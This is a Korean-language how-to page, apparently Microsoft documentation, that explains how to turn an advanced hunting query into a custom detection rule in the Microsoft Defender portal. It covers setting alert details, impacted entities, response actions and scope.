나중에 발생하는 경우 경고를 받고 싶은 정보를 식별하는 쿼리를 만든 후에는 쿼리에서 사용자 지정 검색을 만들 수 있습니다.

사용자 지정 검색은 설정한 빈도에 따라 쿼리를 실행하고 쿼리 결과는 선택한 영향을 받은 자산에 따라 보안 경고를 만듭니다. 이러한 경고는 인시던트와 상관 관계가 있으며 제품 중 하나에서 생성된 다른 보안 경고로 심사될 수 있습니다.

  1. 쿼리 페이지에서 Go 헌팅 지침의 7단계에서 추가된 줄 7과 8을 제거하고 검색 규칙 만들기를 클릭합니다.

    Microsoft Defender 포털의 고급 헌팅 페이지의 쿼리 편집 섹션 스크린샷.

    참고

    검색 규칙 만들기를 클릭하고 쿼리에 구문 오류가 있는 경우 검색 규칙이 저장되지 않습니다. 쿼리를 다시 확인하여 오류가 없는지 확인합니다.

  2. 보안 팀이 경고를 이해할 수 있는 정보, 경고가 생성된 이유 및 예상 작업을 파악할 수 있는 정보로 필수 필드를 채웁니다.

    Microsoft Defender 포털의 경고 세부 정보 페이지 스크린샷

    다음 사용자에게 이 검색 규칙 경고에 대한 정보에 입각한 결정을 내릴 수 있도록 명확하게 필드를 작성해야 합니다.

  3. 이 경고의 영향을 받은 엔터티를 선택합니다. 이 경우 디바이스사서함을 선택합니다.

    Microsoft Defender 포털의 영향을 받은 엔터티 세부 정보 페이지의 스크린샷.

  4. 경고가 트리거될 경우 수행해야 하는 작업을 결정합니다. 이 경우 다른 작업을 수행할 수 있지만 바이러스 백신 검사를 실행합니다.

    Microsoft Defender 포털의 작업 페이지 스크린샷.

  5. 경고 규칙의 범위를 선택합니다. 이 쿼리에는 디바이스가 포함되므로 디바이스 그룹은 엔드포인트용 Microsoft Defender 컨텍스트에 따라 이 사용자 지정 검색과 관련이 있습니다. 영향을 받은 엔터티로 디바이스를 포함하지 않는 사용자 지정 검색을 만들 때 범위가 적용되지 않습니다.

    Microsoft Defender 포털의 범위 페이지 스크린샷.

    이 파일럿의 경우 이 규칙을 프로덕션 환경에서 테스트 디바이스의 하위 집합으로 제한할 수 있습니다.

  6. 만들기를 선택합니다. 그런 다음 탐색 패널에서 사용자 지정 검색 규칙을 선택합니다.

    Microsoft Defender 포털의 사용자 지정 검색 규칙 옵션 스크린샷

    Microsoft Defender 포털의 검색 규칙 및 실행 세부 정보를 표시하는 페이지의 스크린샷.

    이 페이지에서 검색 규칙을 선택하면 세부 정보 페이지가 열립니다.

    Microsoft Defender 포털에서 트리거된 경고의 세부 정보를 표시하는 페이지의 스크린샷.

고급 헌팅에 대한 전문가 교육

악의적 사용자를 추적하는 것은 새로운 보안 분석가와 양념된 위협 사냥꾼을 위한 웹캐스트 시리즈입니다. 고급 헌팅의 기본 사항을 안내하여 고유한 정교한 쿼리를 만듭니다.

시작 하려면 고급 헌팅에 대한 전문가 교육 받기를 참조하세요.

다음 단계

Microsoft Defender XDR을 사용하여 조사 및 응답의 정보를 SecOps 프로세스에 통합합니다.